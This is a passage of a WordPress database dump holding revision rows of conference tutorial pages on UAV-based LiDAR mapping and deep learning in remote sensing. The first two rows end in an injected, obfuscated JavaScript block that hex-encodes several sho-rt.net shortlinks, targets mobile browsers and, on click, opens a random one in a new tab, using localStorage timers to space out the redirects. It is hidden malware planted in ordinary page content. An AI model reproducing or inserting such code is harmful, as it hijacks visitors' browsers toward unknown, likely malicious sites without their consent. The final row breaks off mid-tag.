(3707,1,'2023-02-02 09:20:08','2023-02-02 09:20:08','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Ayman F. Habib</h6>\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-02 09:20:08','2023-02-02 09:20:08','',3701,'https://gsw2023.com/?p=3707',0,'revision','',0),
(3708,1,'2023-02-02 09:25:01','2023-02-02 09:25:01','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3702\" img_size=\"1200x1000\"][vc_column_text]</p>\n<h5>Instructor</h5>\n<h6>Ayman F. Habib</h6>\n<h6>Thomas A. Page Professor in Civil Engineering</h6>\n<h6>Lyles School of Civil Engineering, Purdue University, USA</h6>\n<p>[/vc_column_text][dt_team_masonry img_border_radius=\"0px\" post_title_bottom_margin=\"0px\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"71\"][vc_row_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5>Tutorial Scope</h5>\n<p>&nbsp;</p>\n<h6 style=\"text-align: justify;\"><strong>The continuous developments in direct geo-referencing technology (i.e., integrated Global Navigation Satellite Systems – GNSS – and Inertial Navigation Systems – INS) and remote sensing systems (i.e., passive and active imaging sensors in the visible and infrared range – RGB cameras, hyperspectral push-broom scanners, and laser scanning) are providing the professional geospatial community with ever-growing opportunities to generate accurate 3D information with rich set of attributes. These advances are also coupled with improvement in the sensors’ performance, reduction in the associated cost, and miniaturization of such sensors. Aside from the sensing systems, we are also enjoying the emerging of promising platforms such as Uncrewed Aerial Vehicles (UAVs). This tutorial will provide an overview of recent activities focusing on UAV-based mapping while highlighting: 1) algorithmic developments for improved system calibration of multi-sensor/multi-platform UAV-based mapping; 2) challenges facing UAV-based Structure-from-Motion strategies for deriving point clouds from imagery; 3) benefits of integrating imaging and LiDAR systems onboard UAVs;  4) applications of UAV-based remote sensing systems for a wide range of applications including precision agriculture, documentation of crash scenes, shoreline monitoring, digital forestry, and mapping of highway construction work zones; and 5) interactive visualization of multi-sensor/multi-platform/temporal geospatial data for improved comprehension of delivered products from UAV-based mobile mapping systems.</strong></h6>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"blue\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','UAV-based 3D mapping using imaging and LiDAR systems: challenges, data processing, and applications','','inherit','closed','closed','','3701-revision-v1','','','2023-02-02 09:25:01','2023-02-02 09:25:01','',3701,'https://gsw2023.com/?p=3708',0,'revision','',0),
(3709,1,'2023-02-02 09:46:27','2023-02-02 09:46:27','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3710\" img_size=\"1200x1000\"][vc_column_text]</p>\r\n<h5>Instructor</h5>\r\n<h6>Henry Leung</h6>\r\n<h6>Professor, Electrical and Software Engineering</h6>\r\n<h6>University of Calgary, Canada</h6>\r\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"72\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\r\n<h5 class=\"fancy-title entry-title start-animation-done start-animation\"><span style=\"font-size: 18pt;\">Deep Learning in Remote Sensing: Algorithms and Applications</span></h5>\r\n<p><span style=\"font-size: 14pt;\"><strong>Tutorial Topic</strong></span></p>\r\n<p style=\"text-align: justify;\"><strong>Deep learning algorithms have been widely used in remote sensing because of their effectiveness in image processing and computer vision. In this tutorial, we will present a review of selected deep learning algorithms that are popular in the remote sensing community including convolutional neural networks (CNN), generative adversarial networks (GAN), transformers, transfer learning, and meta learning. In the second half of the tutorial, we will present our research works on these deep learning algorithms in different remote sensing applications: 1) Synthetic aperture radar (SAR) target recognition based on cross-domain and cross-task transfer learning, 2) image generation using GAN and its application to SAR targe recognition, 3) image fusion based on transformers and GAN, 4) satellite image segmentation for different types of satellite images using deep neural networks such as deeplabs and efficient nets, 5) target recognition using meta-learning with shared and specific structures for SAR, and 6) style transfer using GAN to transform remote sensing images among different domains such as SAR and optical images.</strong></p>\r\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 14pt;\"><strong><u>Speaker’s Bio</u></strong></span></p>\r\n<p 